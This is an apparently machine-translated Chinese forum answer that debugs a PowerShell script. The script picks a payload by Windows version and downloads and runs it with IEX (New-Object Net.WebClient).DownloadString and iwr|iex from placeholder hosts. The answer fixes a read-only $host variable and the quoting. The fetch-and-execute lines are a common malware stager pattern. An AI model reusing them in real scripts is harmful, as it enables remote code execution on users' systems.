(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
获取 WMI 对象 Win32 操作系统默认网络凭据
$host = ((Get-WmiObject Win32_OperatingSystem).Caption)
if ($host -eq 'Microsoft Windows 7'){
Write-Host "[+] Downloading windows 7 script"
$URL = http://example.com
IEX (New-Object Net.WebClient).DownloadString('$URL')}
elseif ($host -eq 'Microsoft Windows 8'){
Write-Host "[+] Downloading windows 8 script"
等。。。
发生这种情况是因为$host是一个自动变量。在我的系统上分配失败:
$host = ((Get-WmiObject Win32_OperatingSystem).Caption)
Cannot overwrite variable Host because it is read-only or constant.
At line:1 char:1
+ $host = ((Get-WmiObject Win32_OperatingSystem).Caption)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : WriteError: (Host:String) [], SessionStateUnauthorizedAccessException
+ FullyQualifiedErrorId : VariableNotWritable
尝试使用另一个变量名称,例如 $myHost 。
从提供的代码中,在 IEX 命令中,添加双引号以括起来,因为 Invoke-Expression 的命令参数接受字符串,并添加单引号以括起来$URL。
$URL = "http://example.com"
IEX "(New-Object Net.WebClient).DownloadString('$URL')"
此外,Invoke-Expression 不应该是运行 Net.WebClient 的必要条件,您可以简化如下。
$URL = "http://example.com"
(New-Object Net.WebClient).DownloadString($URL)